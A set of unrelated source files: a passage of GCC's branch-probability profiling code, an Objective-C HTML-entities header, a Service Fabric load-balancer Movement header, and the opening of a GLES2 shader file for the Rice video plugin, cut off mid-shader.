*/ /* The order that the basic blocks are iterated through is important. Since the code that finds spanning trees starts with block 0, low numbered edges are put on the spanning tree in preference to high numbered edges. Hence, most instrumented edges are at the end. Graph solving works much faster if we propagate numbers from the end to the start. This takes an average of slightly more than 3 passes. */ changes = 1; passes = 0; while (changes) { passes++; changes = 0; FOR_BB_BETWEEN (bb, EXIT_BLOCK_PTR, NULL, prev_bb) { struct bb_info *bi = BB_INFO (bb); if (! bi->count_valid) { if (bi->succ_count == 0) { edge e; edge_iterator ei; gcov_type total = 0; FOR_EACH_EDGE (e, ei, bb->succs) total += e->count; bb->count = total; bi->count_valid = 1; changes = 1; } else if (bi->pred_count == 0) { edge e; edge_iterator ei; gcov_type total = 0; FOR_EACH_EDGE (e, ei, bb->preds) total += e->count; bb->count = total; bi->count_valid = 1; changes = 1; } } if (bi->count_valid) { if (bi->succ_count == 1) { edge e; edge_iterator ei; gcov_type total = 0; /* One of the counts will be invalid, but it is zero, so adding it in also doesn't hurt. */ FOR_EACH_EDGE (e, ei, bb->succs) total += e->count; /* Search for the invalid edge, and set its count. */ FOR_EACH_EDGE (e, ei, bb->succs) if (! EDGE_INFO (e)->count_valid && ! EDGE_INFO (e)->ignore) break; /* Calculate count for remaining edge by conservation. */ total = bb->count - total; gcc_assert (e); EDGE_INFO (e)->count_valid = 1; e->count = total; bi->succ_count--; BB_INFO (e->dest)->pred_count--; changes = 1; } if (bi->pred_count == 1) { edge e; edge_iterator ei; gcov_type total = 0; /* One of the counts will be invalid, but it is zero, so adding it in also doesn't hurt. */ FOR_EACH_EDGE (e, ei, bb->preds) total += e->count; /* Search for the invalid edge, and set its count. */ FOR_EACH_EDGE (e, ei, bb->preds) if (!EDGE_INFO (e)->count_valid && !EDGE_INFO (e)->ignore) break; /* Calculate count for remaining edge by conservation. */ total = bb->count - total + e->count; gcc_assert (e); EDGE_INFO (e)->count_valid = 1; e->count = total; bi->pred_count--; BB_INFO (e->src)->succ_count--; changes = 1; } } } } if (dump_file) { int overlap = compute_frequency_overlap (); dump_flow_info (dump_file, dump_flags); fprintf (dump_file, "Static profile overlap: %d.%d%%\n", overlap / (OVERLAP_BASE / 100), overlap % (OVERLAP_BASE / 100)); } total_num_passes += passes; if (dump_file) fprintf (dump_file, "Graph solving took %d passes.\n\n", passes); /* If the graph has been correctly solved, every block will have a succ and pred count of zero. */ FOR_EACH_BB (bb) { gcc_assert (!BB_INFO (bb)->succ_count && !BB_INFO (bb)->pred_count); } /* Check for inconsistent basic block counts */ inconsistent = is_inconsistent (); if (inconsistent) { if (flag_profile_correction) { /* Inconsistency detected. Make it flow-consistent. */ static int informed = 0; if (informed == 0) { informed = 1; inform (input_location, "correcting inconsistent profile data"); } correct_negative_edge_counts (); /* Set bb counts to the sum of the outgoing edge counts */ set_bb_counts (); if (dump_file) fprintf (dump_file, "\nCalling mcf_smooth_cfg\n"); mcf_smooth_cfg (); } else error ("corrupted profile info: profile data is not flow-consistent"); } /* For every edge, calculate its branch probability and add a reg_note to the branch insn to indicate this. 
*/ for (i = 0; i < 20; i++) hist_br_prob[i] = 0; num_branches = 0; FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { edge e; edge_iterator ei; if (bb->count < 0) { error ("corrupted profile info: number of iterations for basic block %d thought to be %i", bb->index, (int)bb->count); bb->count = 0; } FOR_EACH_EDGE (e, ei, bb->succs) { /* Function may return twice in the cased the called function is setjmp or calls fork, but we can't represent this by extra edge from the entry, since extra edge from the exit is already present. We get negative frequency from the entry point. */ if ((e->count < 0 && e->dest == EXIT_BLOCK_PTR) || (e->count > bb->count && e->dest != EXIT_BLOCK_PTR)) { if (block_ends_with_call_p (bb)) e->count = e->count < 0 ? 0 : bb->count; } if (e->count < 0 || e->count > bb->count) { error ("corrupted profile info: number of executions for edge %d-%d thought to be %i", e->src->index, e->dest->index, (int)e->count); e->count = bb->count / 2; } } if (bb->count) { FOR_EACH_EDGE (e, ei, bb->succs) e->probability = (e->count * REG_BR_PROB_BASE + bb->count / 2) / bb->count; if (bb->index >= NUM_FIXED_BLOCKS && block_ends_with_condjump_p (bb) && EDGE_COUNT (bb->succs) >= 2) { int prob; edge e; int index; /* Find the branch edge. It is possible that we do have fake edges here. */ FOR_EACH_EDGE (e, ei, bb->succs) if (!(e->flags & (EDGE_FAKE | EDGE_FALLTHRU))) break; prob = e->probability; index = prob * 20 / REG_BR_PROB_BASE; if (index == 20) index = 19; hist_br_prob[index]++; num_branches++; } } /* As a last resort, distribute the probabilities evenly. Use simple heuristics that if there are normal edges, give all abnormals frequency of 0, otherwise distribute the frequency over abnormals (this is the case of noreturn calls). */ else if (profile_status == PROFILE_ABSENT) { int total = 0; FOR_EACH_EDGE (e, ei, bb->succs) if (!(e->flags & (EDGE_COMPLEX | EDGE_FAKE))) total ++; if (total) { FOR_EACH_EDGE (e, ei, bb->succs) if (!(e->flags & (EDGE_COMPLEX | EDGE_FAKE))) e->probability = REG_BR_PROB_BASE / total; else e->probability = 0; } else { total += EDGE_COUNT (bb->succs); FOR_EACH_EDGE (e, ei, bb->succs) e->probability = REG_BR_PROB_BASE / total; } if (bb->index >= NUM_FIXED_BLOCKS && block_ends_with_condjump_p (bb) && EDGE_COUNT (bb->succs) >= 2) num_branches++; } } counts_to_freqs (); profile_status = PROFILE_READ; compute_function_frequency (); if (dump_file) { fprintf (dump_file, "%d branches\n", num_branches); if (num_branches) for (i = 0; i < 10; i++) fprintf (dump_file, "%d%% branches in range %d-%d%%\n", (hist_br_prob[i] + hist_br_prob[19-i]) * 100 / num_branches, 5 * i, 5 * i + 5); total_num_branches += num_branches; for (i = 0; i < 20; i++) total_hist_br_prob[i] += hist_br_prob[i]; fputc ('\n', dump_file); fputc ('\n', dump_file); } free_aux_for_blocks (); } /* Load value histograms values whose description is stored in VALUES array from .gcda file. CFG_CHECKSUM is the precomputed checksum for the CFG. 
*/ static void compute_value_histograms (histogram_values values, unsigned cfg_checksum, unsigned lineno_checksum) { unsigned i, j, t, any; unsigned n_histogram_counters[GCOV_N_VALUE_COUNTERS]; gcov_type *histogram_counts[GCOV_N_VALUE_COUNTERS]; gcov_type *act_count[GCOV_N_VALUE_COUNTERS]; gcov_type *aact_count; for (t = 0; t < GCOV_N_VALUE_COUNTERS; t++) n_histogram_counters[t] = 0; for (i = 0; i < VEC_length (histogram_value, values); i++) { histogram_value hist = VEC_index (histogram_value, values, i); n_histogram_counters[(int) hist->type] += hist->n_counters; } any = 0; for (t = 0; t < GCOV_N_VALUE_COUNTERS; t++) { if (!n_histogram_counters[t]) { histogram_counts[t] = NULL; continue; } histogram_counts[t] = get_coverage_counts (COUNTER_FOR_HIST_TYPE (t), n_histogram_counters[t], cfg_checksum, lineno_checksum, NULL); if (histogram_counts[t]) any = 1; act_count[t] = histogram_counts[t]; } if (!any) return; for (i = 0; i < VEC_length (histogram_value, values); i++) { histogram_value hist = VEC_index (histogram_value, values, i); gimple stmt = hist->hvalue.stmt; t = (int) hist->type; aact_count = act_count[t]; act_count[t] += hist->n_counters; gimple_add_histogram_value (cfun, stmt, hist); hist->hvalue.counters = XNEWVEC (gcov_type, hist->n_counters); for (j = 0; j < hist->n_counters; j++) hist->hvalue.counters[j] = aact_count[j]; } for (t = 0; t < GCOV_N_VALUE_COUNTERS; t++) free (histogram_counts[t]); } /* The entry basic block will be moved around so that it has index=1, there is nothing at index 0 and the exit is at n_basic_block. */ #define BB_TO_GCOV_INDEX(bb) ((bb)->index - 1) /* When passed NULL as file_name, initialize. When passed something else, output the necessary commands to change line to LINE and offset to FILE_NAME. */ static void output_location (char const *file_name, int line, gcov_position_t *offset, basic_block bb) { static char const *prev_file_name; static int prev_line; bool name_differs, line_differs; if (!file_name) { prev_file_name = NULL; prev_line = -1; return; } name_differs = !prev_file_name || filename_cmp (file_name, prev_file_name); line_differs = prev_line != line; if (name_differs || line_differs) { if (!*offset) { *offset = gcov_write_tag (GCOV_TAG_LINES); gcov_write_unsigned (BB_TO_GCOV_INDEX (bb)); name_differs = line_differs=true; } /* If this is a new source file, then output the file's name to the .bb file. */ if (name_differs) { prev_file_name = file_name; gcov_write_unsigned (0); gcov_write_string (prev_file_name); } if (line_differs) { gcov_write_unsigned (line); prev_line = line; } } } /* Instrument and/or analyze program behavior based on program flow graph. In either case, this function builds a flow graph for the function being compiled. The flow graph is stored in BB_GRAPH. When FLAG_PROFILE_ARCS is nonzero, this function instruments the edges in the flow graph that are needed to reconstruct the dynamic behavior of the flow graph. When FLAG_BRANCH_PROBABILITIES is nonzero, this function reads auxiliary information from a data file containing edge count information from previous executions of the function being compiled. In this case, the flow graph is annotated with actual execution counts, which are later propagated into the rtl for optimization purposes. Main entry point of this file. 
*/ void branch_prob (void) { basic_block bb; unsigned i; unsigned num_edges, ignored_edges; unsigned num_instrumented; struct edge_list *el; histogram_values values = NULL; unsigned cfg_checksum, lineno_checksum; total_num_times_called++; flow_call_edges_add (NULL); add_noreturn_fake_exit_edges (); /* We can't handle cyclic regions constructed using abnormal edges. To avoid these we replace every source of abnormal edge by a fake edge from entry node and every destination by fake edge to exit. This keeps graph acyclic and our calculation exact for all normal edges except for exit and entrance ones. We also add fake exit edges for each call and asm statement in the basic, since it may not return. */ FOR_EACH_BB (bb) { int need_exit_edge = 0, need_entry_edge = 0; int have_exit_edge = 0, have_entry_edge = 0; edge e; edge_iterator ei; /* Functions returning multiple times are not handled by extra edges. Instead we simply allow negative counts on edges from exit to the block past call and corresponding probabilities. We can't go with the extra edges because that would result in flowgraph that needs to have fake edges outside the spanning tree. */ FOR_EACH_EDGE (e, ei, bb->succs) { gimple_stmt_iterator gsi; gimple last = NULL; /* It may happen that there are compiler generated statements without a locus at all. Go through the basic block from the last to the first statement looking for a locus. */ for (gsi = gsi_last_nondebug_bb (bb); !gsi_end_p (gsi); gsi_prev_nondebug (&gsi)) { last = gsi_stmt (gsi); if (gimple_has_location (last)) break; } /* Edge with goto locus might get wrong coverage info unless it is the only edge out of BB. Don't do that when the locuses match, so if (blah) goto something; is not computed twice. */ if (last && gimple_has_location (last) && e->goto_locus != UNKNOWN_LOCATION && !single_succ_p (bb) && (LOCATION_FILE (e->goto_locus) != LOCATION_FILE (gimple_location (last)) || (LOCATION_LINE (e->goto_locus) != LOCATION_LINE (gimple_location (last))))) { basic_block new_bb = split_edge (e); edge ne = single_succ_edge (new_bb); ne->goto_locus = e->goto_locus; ne->goto_block = e->goto_block; } if ((e->flags & (EDGE_ABNORMAL | EDGE_ABNORMAL_CALL)) && e->dest != EXIT_BLOCK_PTR) need_exit_edge = 1; if (e->dest == EXIT_BLOCK_PTR) have_exit_edge = 1; } FOR_EACH_EDGE (e, ei, bb->preds) { if ((e->flags & (EDGE_ABNORMAL | EDGE_ABNORMAL_CALL)) && e->src != ENTRY_BLOCK_PTR) need_entry_edge = 1; if (e->src == ENTRY_BLOCK_PTR) have_entry_edge = 1; } if (need_exit_edge && !have_exit_edge) { if (dump_file) fprintf (dump_file, "Adding fake exit edge to bb %i\n", bb->index); make_edge (bb, EXIT_BLOCK_PTR, EDGE_FAKE); } if (need_entry_edge && !have_entry_edge) { if (dump_file) fprintf (dump_file, "Adding fake entry edge to bb %i\n", bb->index); make_edge (ENTRY_BLOCK_PTR, bb, EDGE_FAKE); /* Avoid bbs that have both fake entry edge and also some exit edge. One of those edges wouldn't be added to the spanning tree, but we can't instrument any of them. */ if (have_exit_edge || need_exit_edge) { gimple_stmt_iterator gsi; gimple first; tree fndecl; gsi = gsi_after_labels (bb); gcc_checking_assert (!gsi_end_p (gsi)); first = gsi_stmt (gsi); if (is_gimple_debug (first)) { gsi_next_nondebug (&gsi); gcc_checking_assert (!gsi_end_p (gsi)); first = gsi_stmt (gsi); } /* Don't split the bbs containing __builtin_setjmp_receiver or __builtin_setjmp_dispatcher calls. These are very special and don't expect anything to be inserted before them. 
*/ if (!is_gimple_call (first) || (fndecl = gimple_call_fndecl (first)) == NULL || DECL_BUILT_IN_CLASS (fndecl) != BUILT_IN_NORMAL || (DECL_FUNCTION_CODE (fndecl) != BUILT_IN_SETJMP_RECEIVER && (DECL_FUNCTION_CODE (fndecl) != BUILT_IN_SETJMP_DISPATCHER))) { if (dump_file) fprintf (dump_file, "Splitting bb %i after labels\n", bb->index); split_block_after_labels (bb); } } } } el = create_edge_list (); num_edges = NUM_EDGES (el); alloc_aux_for_edges (sizeof (struct edge_info)); /* The basic blocks are expected to be numbered sequentially. */ compact_blocks (); ignored_edges = 0; for (i = 0 ; i < num_edges ; i++) { edge e = INDEX_EDGE (el, i); e->count = 0; /* Mark edges we've replaced by fake edges above as ignored. */ if ((e->flags & (EDGE_ABNORMAL | EDGE_ABNORMAL_CALL)) && e->src != ENTRY_BLOCK_PTR && e->dest != EXIT_BLOCK_PTR) { EDGE_INFO (e)->ignore = 1; ignored_edges++; } } /* Create spanning tree from basic block graph, mark each edge that is on the spanning tree. We insert as many abnormal and critical edges as possible to minimize number of edge splits necessary. */ find_spanning_tree (el); /* Fake edges that are not on the tree will not be instrumented, so mark them ignored. */ for (num_instrumented = i = 0; i < num_edges; i++) { edge e = INDEX_EDGE (el, i); struct edge_info *inf = EDGE_INFO (e); if (inf->ignore || inf->on_tree) /*NOP*/; else if (e->flags & EDGE_FAKE) { inf->ignore = 1; ignored_edges++; } else num_instrumented++; } total_num_blocks += n_basic_blocks; if (dump_file) fprintf (dump_file, "%d basic blocks\n", n_basic_blocks); total_num_edges += num_edges; if (dump_file) fprintf (dump_file, "%d edges\n", num_edges); total_num_edges_ignored += ignored_edges; if (dump_file) fprintf (dump_file, "%d ignored edges\n", ignored_edges); /* Compute two different checksums. Note that we want to compute the checksum in only once place, since it depends on the shape of the control flow which can change during various transformations. */ cfg_checksum = coverage_compute_cfg_checksum (); lineno_checksum = coverage_compute_lineno_checksum (); /* Write the data from which gcov can reconstruct the basic block graph and function line numbers */ if (coverage_begin_function (lineno_checksum, cfg_checksum)) { gcov_position_t offset; /* Basic block flags */ offset = gcov_write_tag (GCOV_TAG_BLOCKS); for (i = 0; i != (unsigned) (n_basic_blocks); i++) gcov_write_unsigned (0); gcov_write_length (offset); /* Keep all basic block indexes nonnegative in the gcov output. Index 0 is used for entry block, last index is for exit block. */ ENTRY_BLOCK_PTR->index = 1; EXIT_BLOCK_PTR->index = last_basic_block; /* Arcs */ FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, EXIT_BLOCK_PTR, next_bb) { edge e; edge_iterator ei; offset = gcov_write_tag (GCOV_TAG_ARCS); gcov_write_unsigned (BB_TO_GCOV_INDEX (bb)); FOR_EACH_EDGE (e, ei, bb->succs) { struct edge_info *i = EDGE_INFO (e); if (!i->ignore) { unsigned flag_bits = 0; if (i->on_tree) flag_bits |= GCOV_ARC_ON_TREE; if (e->flags & EDGE_FAKE) flag_bits |= GCOV_ARC_FAKE; if (e->flags & EDGE_FALLTHRU) flag_bits |= GCOV_ARC_FALLTHROUGH; /* On trees we don't have fallthru flags, but we can recompute them from CFG shape. */ if (e->flags & (EDGE_TRUE_VALUE | EDGE_FALSE_VALUE) && e->src->next_bb == e->dest) flag_bits |= GCOV_ARC_FALLTHROUGH; gcov_write_unsigned (BB_TO_GCOV_INDEX (e->dest)); gcov_write_unsigned (flag_bits); } } gcov_write_length (offset); } ENTRY_BLOCK_PTR->index = ENTRY_BLOCK; EXIT_BLOCK_PTR->index = EXIT_BLOCK; /* Line numbers. */ /* Initialize the output. 
*/ output_location (NULL, 0, NULL, NULL); FOR_EACH_BB (bb) { gimple_stmt_iterator gsi; gcov_position_t offset = 0; if (bb == ENTRY_BLOCK_PTR->next_bb) { expanded_location curr_location = expand_location (DECL_SOURCE_LOCATION (current_function_decl)); output_location (curr_location.file, curr_location.line, &offset, bb); } for (gsi = gsi_start_bb (bb); !gsi_end_p (gsi); gsi_next (&gsi)) { gimple stmt = gsi_stmt (gsi); if (gimple_has_location (stmt)) output_location (gimple_filename (stmt), gimple_lineno (stmt), &offset, bb); } /* Notice GOTO expressions eliminated while constructing the CFG. */ if (single_succ_p (bb) && single_succ_edge (bb)->goto_locus != UNKNOWN_LOCATION) { expanded_location curr_location = expand_location (single_succ_edge (bb)->goto_locus); output_location (curr_location.file, curr_location.line, &offset, bb); } if (offset) { /* A file of NULL indicates the end of run. */ gcov_write_unsigned (0); gcov_write_string (NULL); gcov_write_length (offset); } } } #undef BB_TO_GCOV_INDEX if (flag_profile_values) gimple_find_values_to_profile (&values); if (flag_branch_probabilities) { compute_branch_probabilities (cfg_checksum, lineno_checksum); if (flag_profile_values) compute_value_histograms (values, cfg_checksum, lineno_checksum); } remove_fake_edges (); /* For each edge not on the spanning tree, add counting code. */ if (profile_arc_flag && coverage_counter_alloc (GCOV_COUNTER_ARCS, num_instrumented)) { unsigned n_instrumented; gimple_init_edge_profiler (); n_instrumented = instrument_edges (el); gcc_assert (n_instrumented == num_instrumented); if (flag_profile_values) instrument_values (values); /* Commit changes done by instrumentation. */ gsi_commit_edge_inserts (); } free_aux_for_edges (); VEC_free (histogram_value, heap, values); free_edge_list (el); coverage_end_function (lineno_checksum, cfg_checksum); } /* Union find algorithm implementation for the basic blocks using aux fields. */ static basic_block find_group (basic_block bb) { basic_block group = bb, bb1; while ((basic_block) group->aux != group) group = (basic_block) group->aux; /* Compress path. */ while ((basic_block) bb->aux != group) { bb1 = (basic_block) bb->aux; bb->aux = (void *) group; bb = bb1; } return group; } static void union_groups (basic_block bb1, basic_block bb2) { basic_block bb1g = find_group (bb1); basic_block bb2g = find_group (bb2); /* ??? I don't have a place for the rank field. OK. Lets go w/o it, this code is unlikely going to be performance problem anyway. */ gcc_assert (bb1g != bb2g); bb1g->aux = bb2g; } /* This function searches all of the edges in the program flow graph, and puts as many bad edges as possible onto the spanning tree. Bad edges include abnormals edges, which can't be instrumented at the moment. Since it is possible for fake edges to form a cycle, we will have to develop some better way in the future. Also put critical edges to the tree, since they are more expensive to instrument. */ static void find_spanning_tree (struct edge_list *el) { int i; int num_edges = NUM_EDGES (el); basic_block bb; /* We use aux field for standard union-find algorithm. */ FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) bb->aux = bb; /* Add fake edge exit to entry we can't instrument. */ union_groups (EXIT_BLOCK_PTR, ENTRY_BLOCK_PTR); /* First add all abnormal edges to the tree unless they form a cycle. Also add all edges to EXIT_BLOCK_PTR to avoid inserting profiling code behind setting return value from function. 
*/ for (i = 0; i < num_edges; i++) { edge e = INDEX_EDGE (el, i); if (((e->flags & (EDGE_ABNORMAL | EDGE_ABNORMAL_CALL | EDGE_FAKE)) || e->dest == EXIT_BLOCK_PTR) && !EDGE_INFO (e)->ignore && (find_group (e->src) != find_group (e->dest))) { if (dump_file) fprintf (dump_file, "Abnormal edge %d to %d put to tree\n", e->src->index, e->dest->index); EDGE_INFO (e)->on_tree = 1; union_groups (e->src, e->dest); } } /* Now insert all critical edges to the tree unless they form a cycle. */ for (i = 0; i < num_edges; i++) { edge e = INDEX_EDGE (el, i); if (EDGE_CRITICAL_P (e) && !EDGE_INFO (e)->ignore && find_group (e->src) != find_group (e->dest)) { if (dump_file) fprintf (dump_file, "Critical edge %d to %d put to tree\n", e->src->index, e->dest->index); EDGE_INFO (e)->on_tree = 1; union_groups (e->src, e->dest); } } /* And now the rest. */ for (i = 0; i < num_edges; i++) { edge e = INDEX_EDGE (el, i); if (!EDGE_INFO (e)->ignore && find_group (e->src) != find_group (e->dest)) { if (dump_file) fprintf (dump_file, "Normal edge %d to %d put to tree\n", e->src->index, e->dest->index); EDGE_INFO (e)->on_tree = 1; union_groups (e->src, e->dest); } } FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) bb->aux = NULL; } /* Perform file-level initialization for branch-prob processing. */ void init_branch_prob (void) { int i; total_num_blocks = 0; total_num_edges = 0; total_num_edges_ignored = 0; total_num_edges_instrumented = 0; total_num_blocks_created = 0; total_num_passes = 0; total_num_times_called = 0; total_num_branches = 0; for (i = 0; i < 20; i++) total_hist_br_prob[i] = 0; } /* Performs file-level cleanup after branch-prob processing is completed. */ void end_branch_prob (void) { if (dump_file) { fprintf (dump_file, "\n"); fprintf (dump_file, "Total number of blocks: %d\n", total_num_blocks); fprintf (dump_file, "Total number of edges: %d\n", total_num_edges); fprintf (dump_file, "Total number of ignored edges: %d\n", total_num_edges_ignored); fprintf (dump_file, "Total number of instrumented edges: %d\n", total_num_edges_instrumented); fprintf (dump_file, "Total number of blocks created: %d\n", total_num_blocks_created); fprintf (dump_file, "Total number of graph solution passes: %d\n", total_num_passes); if (total_num_times_called != 0) fprintf (dump_file, "Average number of graph solution passes: %d\n", (total_num_passes + (total_num_times_called >> 1)) / total_num_times_called); fprintf (dump_file, "Total number of branches: %d\n", total_num_branches); if (total_num_branches) { int i; for (i = 0; i < 10; i++) fprintf (dump_file, "%d%% branches in range %d-%d%%\n", (total_hist_br_prob[i] + total_hist_br_prob[19-i]) * 100 / total_num_branches, 5*i, 5*i+5); } } }
//
//  NSStringHTMLEntities.h
//  HTMLTranslator
//
//  Created by <NAME> on Thu Aug 12 2004.
//  Copyright (c) 2004 <NAME>.
//
//  This software is provided 'as-is', without any express or implied
//  warranty. In no event will the authors be held liable for any damages
//  arising from the use of this software.
//
//  Permission is granted to anyone to use this software for any purpose,
//  including commercial applications, and to alter it and redistribute it
//  freely, subject to the following restrictions:
//
//  1. The origin of this software must not be misrepresented; you must not
//     claim that you wrote the original software. If you use this software
//     in a product, an acknowledgment in the product documentation would be
//     appreciated but is not required.
//
//  2. Altered source versions must be plainly marked as such, and must not be
//     misrepresented as being the original software.
//
//  3. This notice may not be removed or altered from any source
//     distribution.
//

#import <Foundation/Foundation.h>

@interface NSString (UKHTMLEntities)

-(NSString*) stringByInsertingHTMLEntities;
-(NSString*) stringByInsertingHTMLEntitiesAndLineBreaks: (BOOL)br;  // YES = generate <br>s, NO = same as stringByInsertingHTMLEntities.

@end
<reponame>gridgentoo/ServiceFabricAzure<gh_stars>1000+ // ------------------------------------------------------------ // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License (MIT). See License.txt in the repo root for license information. // ------------------------------------------------------------ #pragma once #include "PartitionEntry.h" #include "PlacementReplica.h" namespace Reliability { namespace LoadBalancingComponent { class NodeEntry; class ServiceEntry; class Movement { public: struct Type { enum Enum { None = 0, Swap = 1, Move = 2, Add = 3, Promote = 4, AddAndPromote = 5, Void = 6, Drop = 7 }; }; static Movement Invalid; static Movement Create(PlacementReplica const* r1, PlacementReplica const* r2, bool forUpgrade = false); static Movement Create(PlacementReplica const* replica, NodeEntry const* targetNode, bool forUpgrade = false); static Movement CreatePromoteSecondaryMovement(PartitionEntry const* partition, NodeEntry const* targetNode, PlacementReplica const* targetReplica, bool isTestMode); //A migrate is whatever necessary to get a primary onto the target node minimally, whether, swap, add and promote, or move static Movement CreateMigratePrimaryMovement(PartitionEntry const* partition, NodeEntry const* targetNode, bool isTestMode); static Movement CreateAddAndPromoteMovement(PlacementReplica const* replica, NodeEntry const* targetNode); static Movement CreateVoidMovement(PartitionEntry const* partition, NodeEntry const* targetNode); static Movement CreateDrop(PlacementReplica const* replica, NodeEntry const* sourceNode); Movement(); // using compiler generated copy constructor and assignment constructor __declspec (property(get=get_Service)) ServiceEntry const* Service; ServiceEntry const* get_Service() const { return partition_->Service; } __declspec (property(get=get_Partition)) PartitionEntry const* Partition; PartitionEntry const* get_Partition() const { return partition_; } __declspec (property(get=get_SourceToBeDeletedReplica)) PlacementReplica const* SourceToBeDeletedReplica; PlacementReplica const* get_SourceToBeDeletedReplica() const { return (!sourceOrNewReplica_ || sourceOrNewReplica_->IsNew) ? nullptr: sourceOrNewReplica_; } __declspec (property(get=get_TargetToBeDeletedReplica)) PlacementReplica const* TargetToBeDeletedReplica; PlacementReplica const* get_TargetToBeDeletedReplica() const { return targetReplica_; } __declspec (property(get=get_SourceToBeAddedReplica)) PlacementReplica const* SourceToBeAddedReplica; PlacementReplica const* get_SourceToBeAddedReplica() const { return targetReplica_; } __declspec (property(get=get_TargetToBeAddedReplica)) PlacementReplica const* TargetToBeAddedReplica; PlacementReplica const* get_TargetToBeAddedReplica() const { return sourceOrNewReplica_; } __declspec (property(get=get_SourceNode)) NodeEntry const* SourceNode; NodeEntry const* get_SourceNode() const { return sourceNode_; } __declspec (property(get=get_TargetNode)) NodeEntry const* TargetNode; NodeEntry const* get_TargetNode() const { return targetNode_; } // the role of existing replica on source node __declspec (property(get=get_SourceRole)) ReplicaRole::Enum SourceRole; ReplicaRole::Enum get_SourceRole() const { return (!sourceOrNewReplica_ || sourceOrNewReplica_->IsNew) ? ReplicaRole::None : sourceOrNewReplica_->Role; } // the role of existing replica on target node __declspec (property(get=get_TargetRole)) ReplicaRole::Enum TargetRole; ReplicaRole::Enum get_TargetRole() const { return targetReplica_ != nullptr ? 
targetReplica_->Role : ReplicaRole::None; } __declspec (property(get=get_Type)) Type::Enum MoveType; Type::Enum get_Type() const { return type_; } __declspec (property(get=get_IsSwap)) bool IsSwap; bool get_IsSwap() const { return type_ == Type::Swap; } __declspec (property(get=get_IsMove)) bool IsMove; bool get_IsMove() const { return type_ == Type::Move; } __declspec (property(get=get_IsAdd)) bool IsAdd; bool get_IsAdd() const { return type_ == Type::Add; } __declspec (property(get=get_IsVoid)) bool IsVoid; bool get_IsVoid() const { return type_ == Type::Void; } __declspec (property(get=get_IsPromote)) bool IsPromote; bool get_IsPromote() const { return type_ == Type::Promote;} __declspec (property(get=get_IsAddAndPromote)) bool IsAddAndPromote; bool get_IsAddAndPromote() const { return type_ == Type::AddAndPromote;} __declspec (property(get=get_IsDrop)) bool IsDrop; bool get_IsDrop() const { return type_ == Type::Drop; } __declspec (property(get=get_IsValid)) bool IsValid; bool get_IsValid() const { return partition_ != nullptr; } __declspec (property(get = get_IncreasingTargetLoad)) bool IncreasingTargetLoad; bool get_IncreasingTargetLoad() const { return IsMove || IsAdd || IsAddAndPromote; } __declspec (property(get = get_TargetNodeHasLoadBeforeMove)) bool TargetNodeHasLoadBeforeMove; bool get_TargetNodeHasLoadBeforeMove() const { return IsSwap || IsPromote; } bool operator == ( Movement const& other ) const; bool operator != ( Movement const& other ) const; void ForEachReplica(std::function<void(PlacementReplica const *)> processor) const; void WriteTo(Common::TextWriter& writer, Common::FormatOptions const &) const; private: PartitionEntry const* partition_; PlacementReplica const* sourceOrNewReplica_; // existing replica on source node or the new replica PlacementReplica const* targetReplica_; // existing replica on target node NodeEntry const* sourceNode_; NodeEntry const* targetNode_; Type::Enum type_; }; void WriteToTextWriter(Common::TextWriter & w, Movement::Type::Enum const & val); } }
2,693
335
<filename>code/src/gles2rice/src/OGLES2FragmentShaders.cpp /* Copyright (C) 2003 Rice1964 This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include <stdlib.h> #include "OGLES2FragmentShaders.h" #include "OGLRender.h" #include "OGLTexture.h" #define ALPHA_TEST " if(gl_FragColor.a < AlphaRef) discard; \n" GLuint vertexProgram = 9999; const char *vertexShader = "#version " GLSL_VERSION "\n" #if !defined(HAVE_OPENGLES2) "#define lowp \n" "#define mediump \n" #endif "attribute mediump vec4 aPosition; \n"\ "attribute lowp vec4 aColor; \n"\ "attribute lowp vec2 aTexCoord0; \n"\ "attribute lowp vec2 aTexCoord1; \n"\ "attribute lowp vec2 aAtlasTransform; \n"\ "attribute mediump float aFogCoord; \n"\ " \n"\ "uniform vec2 FogMinMax; \n"\ " \n"\ "varying lowp float vFactor; \n"\ "varying lowp vec4 vShadeColor; \n"\ "varying mediump vec2 vTexCoord0; \n"\ "varying lowp vec2 vTexCoord1; \n"\ "varying lowp float vFog; \n"\ " \n"\ "void main() \n"\ "{ \n"\ " gl_Position = aPosition; \n"\ " vShadeColor = aColor; \n"\ " vTexCoord0 = aTexCoord0; \n"\ " vTexCoord1 = aTexCoord1; \n"\ " vFog = (FogMinMax[1] - aFogCoord) / (FogMinMax[1] - FogMinMax[0]); \n"\ " vFog = clamp(vFog, 0.0, 1.0); \n"\ "} \n"\ " \n"; const char *fragmentHeader = "#define saturate(x) clamp( x, 0.0, 1.0 ) \n" #if !defined(HAVE_OPENGLES2) "#define lowp \n" "#define mediump \n" #else "precision lowp float; \n" #endif "#ifdef NEED_TEX0 \n"\ "uniform sampler2D uTex0; \n"\ "#endif \n"\ " \n"\ "#ifdef NEED_TEX1 \n"\ "uniform sampler2D uTex1; \n"\ "#endif \n"\ " \n"\ "uniform vec4 EnvColor; \n"\ "uniform vec4 PrimColor; \n"\ "uniform vec4 EnvFrac; \n"\ "uniform vec4 PrimFrac; \n"\ "uniform float AlphaRef; \n"\ "uniform vec4 FogColor; \n"\ " \n"\ "varying lowp vec4 vShadeColor; \n"\ "varying mediump vec2 vTexCoord0; \n"\ "varying lowp vec2 vTexCoord1; \n"\ "varying lowp float vFog; \n"\ " \n"\ "void main() \n"\ "{ \n"\ " vec4 comb,comb2; \n"\ " \n"\ "#ifdef NEED_TEX0 \n"\ " vec4 t0 = texture2D(uTex0,vTexCoord0); \n"\ "#endif \n"\ " \n"\ "#ifdef NEED_TEX1 \n"\ " vec4 t1 = texture2D(uTex1,vTexCoord1); \n"\ "#endif \n"; const char *fragmentFooter = " \n"\ "#ifdef FOG \n"\ " gl_FragColor.rgb = mix(FogColor.rgb, comb.rgb, vFog); 